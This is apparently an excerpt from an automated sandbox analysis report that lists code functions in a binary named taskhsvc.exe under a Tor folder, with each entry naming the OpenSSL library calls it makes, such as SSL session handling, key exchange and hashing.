            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB80C0 BUF_memdup,__stack_chk_fail,__stack_chk_fail,SSL_CTX_add_client_custom_ext,CRYPTO_realloc,86_2_6CDB80C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD21D2 CRYPTO_malloc,CRYPTO_free,sk_new_null,CRYPTO_free,sk_dup,sk_free,sk_free,sk_set_cmp_func,sk_sort,86_2_6CDD21D2
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA81C9 CRYPTO_lock,CRYPTO_lock,CRYPTO_malloc,ERR_put_error,86_2_6CDA81C9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBD1C7 pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,86_2_6CDBD1C7
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC41F0 SSL_CTX_set_generate_session_id,CRYPTO_lock,CRYPTO_lock,86_2_6CDC41F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD96192 i2d_SSL_SESSION,CRYPTO_malloc,EVP_CIPHER_CTX_init,HMAC_CTX_init,i2d_SSL_SESSION,d2i_SSL_SESSION,i2d_SSL_SESSION,i2d_SSL_SESSION,SSL_SESSION_free,BUF_MEM_grow,EVP_CIPHER_CTX_iv_length,EVP_CIPHER_CTX_iv_length,EVP_EncryptUpdate,EVP_EncryptFinal,HMAC_Update,HMAC_Final,EVP_CIPHER_CTX_cleanup,HMAC_CTX_cleanup,CRYPTO_free,86_2_6CD96192
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCB190 CRYPTO_malloc,RSA_up_ref,DHparams_dup,BN_dup,BN_dup,EC_KEY_dup,CRYPTO_add_lock,CRYPTO_add_lock,X509_chain_up_ref,CRYPTO_malloc,EVP_sha1,EVP_sha1,EVP_sha1,EVP_sha1,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_add_lock,CRYPTO_add_lock,ERR_put_error,RSA_free,DH_free,EC_KEY_free,X509_free,EVP_PKEY_free,sk_pop_free,CRYPTO_free,ERR_put_error,ERR_put_error,__stack_chk_fail,86_2_6CDCB190
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC9E80 SSL_CTX_get_quiet_shutdown,__stack_chk_fail,SSL_set_quiet_shutdown,__stack_chk_fail,SSL_get_quiet_shutdown,__stack_chk_fail,SSL_set_shutdown,__stack_chk_fail,SSL_get_shutdown,__stack_chk_fail,SSL_version,__stack_chk_fail,SSL_get_SSL_CTX,__stack_chk_fail,SSL_set_SSL_CTX,CRYPTO_add_lock,CRYPTO_add_lock,OpenSSLDie,memcmp,__stack_chk_fail,SSL_CTX_set_default_verify_paths,__stack_chk_fail,SSL_CTX_load_verify_locations,__stack_chk_fail,X509_STORE_set_default_paths,X509_STORE_load_locations,86_2_6CDC9E80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE195 CRYPTO_free,86_2_6CDAE195
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9A180 RAND_bytes,RSA_public_encrypt,OPENSSL_cleanse,EC_KEY_get0_group,EC_KEY_get0_public_key,EC_KEY_new,EC_KEY_set_group,EC_KEY_generate_key,EC_GROUP_get_degree,ECDH_compute_key,EC_KEY_get0_public_key,EC_POINT_point2oct,CRYPTO_malloc,BN_CTX_new,EC_KEY_get0_public_key,EC_POINT_point2oct,BN_CTX_free,CRYPTO_free,EC_KEY_free,EVP_PKEY_free,EVP_PKEY_get1_DH,DH_compute_key,DH_free,X509_get_pubkey,EVP_PKEY_CTX_new,EVP_PKEY_encrypt_init,RAND_bytes,EVP_MD_CTX_create,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_destroy,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_PKEY_free,BN_num_bits,BN_bn2bin,CRYPTO_free,BUF_strdup,SRP_generate_client_master_secret,ERR_put_error,BN_CTX_free,EVP_PKEY_free,X509_get_pubkey,EVP_PKEY_free,DHparams_dup,DH_generate_key,ERR_put_error,DH_free,BN_num_bits,BN_bn2bin,ERR_put_error,BN_CTX_free,CRYPTO_free,EC_KEY_free,strlen,ERR_put_error,OPENSSL_cleanse,OPENSSL_cleanse,X509_get_pubkey,ERR_put_error,ERR_put_error,BN_CTX_free,DH_free,ERR_put_error,X509_get_pubkey,EVP_PKEY_get1_DH,EVP_PKEY_free,ERR_put_error,EVP_PKEY_free,memmove,CRYPTO_free,BUF_strdup,CRYPTO_free,BUF_strdup,OPENSSL_cleanse,OPENSSL_cleanse,EVP_MD_CTX_destroy,ERR_put_error,EVP_PKEY_CTX_free,ERR_put_error,BN_CTX_free,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,ERR_put_error,ERR_put_error,ERR_put_error,BN_CTX_free,ERR_put_error,ERR_put_error,86_2_6CD9A180
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA7180 ERR_put_error,ERR_put_error,CRYPTO_memcmp,OpenSSLDie,ERR_put_error,OpenSSLDie,__stack_chk_fail,86_2_6CDA7180
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF1BD CRYPTO_add_lock,abort,memcmp,time,CRYPTO_lock,lh_retrieve,CRYPTO_add_lock,CRYPTO_lock,CRYPTO_add_lock,ERR_put_error,SSL_CTX_add_session,CRYPTO_add_lock,CRYPTO_lock,lh_retrieve,CRYPTO_lock,lh_delete,CRYPTO_lock,SSL_SESSION_free,86_2_6CDCF1BD
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE1BC CRYPTO_free,86_2_6CDAE1BC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE1AC CRYPTO_free,86_2_6CDAE1AC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC91A0 SSL_set_accept_state,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_destroy,EVP_MD_CTX_destroy,__stack_chk_fail,86_2_6CDC91A0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC51A0 SSL_get_peer_certificate,CRYPTO_add_lock,86_2_6CDC51A0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB2159 CRYPTO_free,86_2_6CDB2159
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD9159 ERR_put_error,asn1_add_error,SSL_SESSION_free,d2i_ASN1_OCTET_STRING,d2i_ASN1_OCTET_STRING,CRYPTO_free,ASN1_INTEGER_get,CRYPTO_free,ASN1_INTEGER_get,CRYPTO_free,X509_free,ASN1_INTEGER_get,CRYPTO_free,ASN1_INTEGER_get,CRYPTO_free,asn1_const_Finish,ASN1_get_object,ASN1_get_object,d2i_ASN1_OCTET_STRING,d2i_ASN1_INTEGER,d2i_ASN1_INTEGER,ASN1_get_object,ASN1_get_object,ASN1_get_object,ASN1_get_object,d2i_ASN1_OCTET_STRING,BUF_strndup,CRYPTO_free,d2i_ASN1_INTEGER,d2i_ASN1_INTEGER,d2i_ASN1_OCTET_STRING,CRYPTO_free,d2i_ASN1_INTEGER,d2i_ASN1_INTEGER,d2i_ASN1_INTEGER,ASN1_const_check_infinite_end,d2i_ASN1_OCTET_STRING,ASN1_const_check_infinite_end,ASN1_const_check_infinite_end,ASN1_const_check_infinite_end,d2i_ASN1_INTEGER,ASN1_const_check_infinite_end,86_2_6CDD9159
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA19D0 __stack_chk_fail,COMP_CTX_free,COMP_CTX_new,EVP_CIPHER_CTX_cleanup,COMP_CTX_free,COMP_CTX_new,EVP_MD_size,EVP_CIPHER_key_length,EVP_CIPHER_iv_length,EVP_MD_CTX_init,EVP_CipherInit_ex,OPENSSL_cleanse,OPENSSL_cleanse,EVP_MD_CTX_cleanup,ERR_put_error,EVP_md5,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_md5,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,CRYPTO_malloc,EVP_CIPHER_CTX_init,CRYPTO_malloc,EVP_CIPHER_CTX_init,CRYPTO_malloc,ERR_put_error,OpenSSLDie,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,EVP_MD_size,EVP_CIPHER_key_length,EVP_CIPHER_iv_length,OPENSSL_cleanse,CRYPTO_free,CRYPTO_malloc,EVP_MD_CTX_init,EVP_MD_CTX_set_flags,EVP_MD_CTX_init,EVP_sha1,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_md5,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,ERR_put_error,ERR_put_error,OPENSSL_cleanse,EVP_MD_CTX_cleanup,EVP_MD_CTX_cleanup,ERR_put_error,__stack_chk_fail,EVP_DigestFinal_ex,86_2_6CDA19D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9F17B CRYPTO_free,DH_free,EC_KEY_free,sk_pop_free,BIO_free,CRYPTO_free,SSL_SRP_CTX_free,OPENSSL_cleanse,CRYPTO_free,86_2_6CD9F17B
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDE177 CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,ERR_put_error,86_2_6CDDE177
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF170 CRYPTO_add_lock,abort,memcmp,__stack_chk_fail,86_2_6CDCF170
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC70D0 SSL_set_alpn_protos,CRYPTO_free,CRYPTO_malloc,86_2_6CDC70D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC5160 SSL_pending,__stack_chk_fail,SSL_get_peer_certificate,CRYPTO_add_lock,__stack_chk_fail,SSL_get_peer_cert_chain,__stack_chk_fail,86_2_6CDC5160
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCD109 OPENSSL_DIR_end,CRYPTO_lock,ERR_put_error,86_2_6CDCD109
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF107 CRYPTO_add_lock,__stack_chk_fail,86_2_6CDCF107
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD6F30 SSL_CTX_use_PrivateKey,X509_get_pubkey,EVP_PKEY_copy_parameters,EVP_PKEY_free,ERR_clear_error,X509_check_private_key,EVP_PKEY_free,CRYPTO_add_lock,X509_check_private_key,ERR_clear_error,X509_check_private_key,RSA_flags,X509_free,ERR_put_error,ERR_put_error,EVP_PKEY_free,86_2_6CDD6F30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD52D8 X509_get_pubkey,EVP_PKEY_copy_parameters,ERR_clear_error,X509_check_private_key,EVP_PKEY_free,X509_free,CRYPTO_add_lock,EVP_PKEY_free,ERR_clear_error,ERR_put_error,RSA_flags,ERR_put_error,EVP_PKEY_free,86_2_6CDD52D8
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD22D2 CRYPTO_malloc,CRYPTO_free,sk_new_null,CRYPTO_free,sk_dup,sk_free,sk_free,sk_set_cmp_func,sk_sort,86_2_6CDD22D2
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAF2FB strlen,strlen,SSL_get_ciphers,sk_num,ERR_put_error,SSL_ctrl,SSL_get_srtp_profiles,CRYPTO_malloc,sk_value,i2d_OCSP_RESPID,sk_num,i2d_X509_EXTENSIONS,sk_value,i2d_OCSP_RESPID,sk_num,i2d_X509_EXTENSIONS,ERR_put_error,86_2_6CDAF2FB
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB62E9 EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_malloc,CRYPTO_malloc,OPENSSL_cleanse,CRYPTO_free,86_2_6CDB62E9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD992E5 sk_new,CRYPTO_free,ERR_put_error,X509_NAME_free,sk_pop_free,86_2_6CD992E5
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA7299 CRYPTO_memcmp,86_2_6CDA7299
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB3290 CRYPTO_free,CRYPTO_malloc,__stack_chk_fail,86_2_6CDB3290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB6290 EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_malloc,CRYPTO_malloc,OPENSSL_cleanse,CRYPTO_free,ERR_put_error,ERR_put_error,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,memmove,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_block_size,EVP_CIPHER_flags,EVP_CIPHER_CTX_ctrl,EVP_Cipher,EVP_CIPHER_flags,EVP_CIPHER_flags,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_flags,EVP_CIPHER_iv_length,_iob,fprintf,OpenSSLDie,OpenSSLDie,RAND_bytes,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_type,ERR_put_error,EVP_MD_CTX_init,EVP_MD_CTX_copy_ex,EVP_DigestFinal_ex,EVP_MD_CTX_cleanup,__stack_chk_fail,EVP_MD_CTX_init,EVP_MD_size,EVP_MD_CTX_copy_ex,EVP_MD_CTX_cleanup,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,EVP_MD_CTX_cleanup,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,EVP_DigestFinal_ex,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestSignFinal,EVP_MD_CTX_copy,EVP_MD_CTX_cleanup,EVP_MD_CTX_cleanup,OpenSSLDie,__stack_chk_fail,ERR_put_error,OPENSSL_cleanse,ERR_put_error,__stack_chk_fail,CRYPTO_malloc,CRYPTO_malloc,memcmp,memcmp,memcmp,ERR_put_error,CRYPTO_free,CRYPTO_free,ERR_put_error,CRYPTO_free,memcmp,OPENSSL_cleanse,OPENSSL_cleanse,ERR_put_error,__stack_chk_fail,__stack_chk_fail,86_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC328D X509_VERIFY_PARAM_free,SSL_CTX_flush_sessions,CRYPTO_free_ex_data,lh_free,X509_STORE_free,sk_free,sk_free,sk_pop_free,sk_pop_free,sk_free,CRYPTO_free,SSL_CTX_SRP_CTX_free,ENGINE_finish,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,__stack_chk_fail,86_2_6CDC328D
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC4280 SSL_set_generate_session_id,CRYPTO_lock,CRYPTO_lock,86_2_6CDC4280
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9F2BE sk_pop_free,CRYPTO_free,DH_free,EC_KEY_free,BIO_free,CRYPTO_free,CRYPTO_free,__stack_chk_fail,ERR_put_error,DHparams_dup,DH_free,RSAPrivateKey_dup,RSA_free,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,86_2_6CD9F2BE
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC92B0 SSL_set_connect_state,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_destroy,EVP_MD_CTX_destroy,__stack_chk_fail,ERR_put_error,__stack_chk_fail,ERR_put_error,__stack_chk_fail,ERR_put_error,__stack_chk_fail,86_2_6CDC92B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA82A7 CRYPTO_lock,CRYPTO_lock,CRYPTO_malloc,ERR_put_error,86_2_6CDA82A7
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE257 BUF_memdup,ERR_put_error,CRYPTO_add_lock,86_2_6CDCE257
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC7250 SSL_export_keying_material,__stack_chk_fail,SSL_CTX_new,SSL_get_ex_data_X509_STORE_CTX_idx,CRYPTO_malloc,lh_new,X509_STORE_new,sk_num,X509_VERIFY_PARAM_new,EVP_get_digestbyname,EVP_get_digestbyname,EVP_get_digestbyname,sk_new_null,CRYPTO_new_ex_data,RAND_bytes,RAND_bytes,RAND_bytes,SSL_CTX_SRP_CTX_init,CRYPTO_malloc,CRYPTO_malloc,ERR_put_error,CRYPTO_add_lock,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,SSL_COMP_get_compression_methods,ERR_put_error,86_2_6CDC7250
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD2252 CRYPTO_malloc,CRYPTO_free,sk_new_null,CRYPTO_free,sk_dup,sk_free,sk_free,sk_set_cmp_func,sk_sort,86_2_6CDD2252
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC6930 ERR_put_error,__stack_chk_fail,SSL_get_servername,__stack_chk_fail,SSL_get_servername_type,__stack_chk_fail,SSL_select_next_proto,__stack_chk_fail,SSL_get0_next_proto_negotiated,__stack_chk_fail,SSL_CTX_set_next_protos_advertised_cb,__stack_chk_fail,SSL_CTX_set_next_proto_select_cb,__stack_chk_fail,SSL_CTX_set_alpn_protos,CRYPTO_malloc,__stack_chk_fail,SSL_set_alpn_protos,CRYPTO_malloc,__stack_chk_fail,SSL_CTX_set_alpn_select_cb,__stack_chk_fail,SSL_get0_alpn_selected,__stack_chk_fail,SSL_export_keying_material,__stack_chk_fail,SSL_CTX_new,SSL_get_ex_data_X509_STORE_CTX_idx,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,SSL_CTX_free,__stack_chk_fail,SSL_CTX_set_default_passwd_cb,__stack_chk_fail,SSL_CTX_set_default_passwd_cb_userdata,__stack_chk_fail,SSL_CTX_set_cert_verify_callback,__stack_chk_fail,SSL_CTX_set_verify,__stack_chk_fail,SSL_CTX_set_verify_depth,__stack_chk_fail,SSL_CTX_set_cert_cb,__stack_chk_fail,SSL_set_cert_cb,__stack_chk_fail,86_2_6CDC6930
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC3270 CRYPTO_free_ex_data,SSL_CTX_SRP_CTX_free,86_2_6CDC3270
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC5270 SSL_copy_session_id,SSL_get_session,SSL_set_session,CRYPTO_add_lock,ERR_put_error,__stack_chk_fail,SSL_CTX_check_private_key,X509_check_private_key,ERR_put_error,ERR_put_error,__stack_chk_fail,SSL_check_private_key,X509_check_private_key,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,86_2_6CDC5270
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDC270 SSL_CONF_CTX_new,CRYPTO_malloc,86_2_6CDDC270
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB8265 CRYPTO_realloc,86_2_6CDB8265
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD99200 ERR_put_error,X509_NAME_free,sk_new,CRYPTO_free,ERR_put_error,X509_NAME_free,sk_pop_free,sk_push,d2i_X509_NAME,ERR_clear_error,sk_pop_free,X509_NAME_free,ERR_put_error,CRYPTO_malloc,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,86_2_6CD99200
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF225 CRYPTO_add_lock,86_2_6CDCF225
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD23D2 CRYPTO_malloc,CRYPTO_free,sk_new_null,CRYPTO_free,sk_dup,sk_free,sk_free,sk_set_cmp_func,sk_sort,86_2_6CDD23D2
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCC3C0 CRYPTO_malloc,ERR_put_error,__stack_chk_fail,86_2_6CDCC3C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCA3C0 SSL_get_verify_result,__stack_chk_fail,SSL_get_ex_new_index,CRYPTO_get_ex_new_index,__stack_chk_fail,SSL_set_ex_data,__stack_chk_fail,SSL_get_ex_data,__stack_chk_fail,SSL_CTX_get_ex_new_index,CRYPTO_get_ex_new_index,__stack_chk_fail,SSL_CTX_set_ex_data,__stack_chk_fail,SSL_CTX_get_ex_data,__stack_chk_fail,__stack_chk_fail,SSL_CTX_get_cert_store,__stack_chk_fail,SSL_CTX_set_cert_store,X509_STORE_free,__stack_chk_fail,CRYPTO_set_ex_data,CRYPTO_get_ex_data,86_2_6CDCA3C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE3C0 CRYPTO_malloc,time,CRYPTO_new_ex_data,SSL_get_default_timeout,ERR_put_error,CRYPTO_add_lock,BUF_strdup,CRYPTO_lock,CRYPTO_lock,SSL_has_matching_session_id,ERR_put_error,CRYPTO_add_lock,ERR_put_error,__stack_chk_fail,86_2_6CDCE3C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBC3F0 CRYPTO_malloc,pitem_new,pqueue_insert,ERR_put_error,CRYPTO_free,CRYPTO_free,pitem_free,CRYPTO_free,ERR_put_error,pitem_free,__stack_chk_fail,pqueue_peek,pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,pqueue_peek,pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,ERR_put_error,pqueue_size,SSL_state,pqueue_size,CRYPTO_malloc,pitem_new,pqueue_insert,ERR_put_error,CRYPTO_free,CRYPTO_free,pitem_free,__stack_chk_fail,CRYPTO_free,ERR_put_error,pitem_free,86_2_6CDBC3F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF3F7 CRYPTO_add_lock,CRYPTO_lock,lh_retrieve,CRYPTO_add_lock,CRYPTO_lock,86_2_6CDCF3F7
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCA3F0 SSL_get_ex_new_index,CRYPTO_get_ex_new_index,86_2_6CDCA3F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC0000 SSL_get_wbio,BIO_ctrl,EVP_CIPHER_CTX_flags,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,SSL_get_wbio,BIO_ctrl,SSL_get_wbio,BIO_ctrl,OpenSSLDie,SSL_get_wbio,BIO_ctrl,SSL_ctrl,OpenSSLDie,OpenSSLDie,EVP_CIPHER_block_size,__stack_chk_fail,pqueue_peek,pqueue_pop,CRYPTO_free,CRYPTO_free,CRYPTO_free,pitem_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,pqueue_pop,CRYPTO_free,CRYPTO_free,CRYPTO_free,pitem_free,ERR_put_error,ERR_put_error,ERR_put_error,pqueue_find,CRYPTO_malloc,pitem_new,pqueue_insert,OpenSSLDie,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,ERR_put_error,__stack_chk_fail,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,CRYPTO_malloc,CRYPTO_free,86_2_6CDC0000
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA7180 ERR_put_error,ERR_put_error,CRYPTO_memcmp,OpenSSLDie,ERR_put_error,OpenSSLDie,__stack_chk_fail,86_2_6CDA7180
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB3380 CRYPTO_free,CRYPTO_malloc,EVP_sha256,EVP_md5,EVP_sha1,EVP_sha224,EVP_sha384,EVP_sha512,EVP_sha1,EVP_sha1,EVP_sha1,EVP_sha1,__stack_chk_fail,CRYPTO_free,ERR_put_error,ERR_put_error,86_2_6CDB3380
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB8370 SSL_CTX_add_server_custom_ext,CRYPTO_realloc,__stack_chk_fail,SSL_extension_supported,__stack_chk_fail,__stack_chk_fail,DTLSv1_method,__stack_chk_fail,DTLSv1_2_method,__stack_chk_fail,86_2_6CDB8370
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD2352 CRYPTO_malloc,CRYPTO_free,sk_new_null,CRYPTO_free,sk_dup,sk_free,sk_free,sk_set_cmp_func,sk_sort,86_2_6CDD2352
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD337C CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,86_2_6CDD337C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC2376 CRYPTO_malloc,RAND_bytes,CRYPTO_free,CRYPTO_free,CRYPTO_free,86_2_6CDC2376
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB8370 SSL_CTX_add_server_custom_ext,CRYPTO_realloc,__stack_chk_fail,SSL_extension_supported,__stack_chk_fail,__stack_chk_fail,DTLSv1_method,__stack_chk_fail,DTLSv1_2_method,__stack_chk_fail,86_2_6CDB8370
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC4369 CRYPTO_lock,lh_retrieve,CRYPTO_lock,86_2_6CDC4369
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC7310 SSL_CTX_new,SSL_get_ex_data_X509_STORE_CTX_idx,CRYPTO_malloc,lh_new,X509_STORE_new,sk_num,X509_VERIFY_PARAM_new,EVP_get_digestbyname,EVP_get_digestbyname,EVP_get_digestbyname,sk_new_null,CRYPTO_new_ex_data,RAND_bytes,RAND_bytes,RAND_bytes,SSL_CTX_SRP_CTX_init,CRYPTO_malloc,CRYPTO_malloc,86_2_6CDC7310
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC4310 SSL_has_matching_session_id,CRYPTO_lock,lh_retrieve,CRYPTO_lock,__stack_chk_fail,SSL_CTX_set_purpose,__stack_chk_fail,SSL_set_purpose,__stack_chk_fail,SSL_CTX_set_trust,__stack_chk_fail,SSL_set_trust,__stack_chk_fail,SSL_CTX_set1_param,__stack_chk_fail,SSL_set1_param,__stack_chk_fail,SSL_CTX_get0_param,__stack_chk_fail,SSL_get0_param,__stack_chk_fail,SSL_certs_clear,__stack_chk_fail,__stack_chk_fail,86_2_6CDC4310
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9A30C EC_KEY_get0_group,EC_KEY_get0_public_key,EC_KEY_new,EC_KEY_set_group,EC_KEY_generate_key,EC_GROUP_get_degree,ECDH_compute_key,EC_KEY_get0_public_key,EC_POINT_point2oct,CRYPTO_malloc,BN_CTX_new,EC_KEY_get0_public_key,EC_POINT_point2oct,BN_CTX_free,CRYPTO_free,EC_KEY_free,EVP_PKEY_free,86_2_6CD9A30C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF307 CRYPTO_add_lock,abort,memcmp,time,86_2_6CDCF307
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDC300 SSL_CONF_CTX_finish,__stack_chk_fail,SSL_CONF_CTX_free,CRYPTO_free,__stack_chk_fail,SSL_CONF_CTX_set_flags,__stack_chk_fail,SSL_CONF_CTX_clear_flags,__stack_chk_fail,86_2_6CDDC300
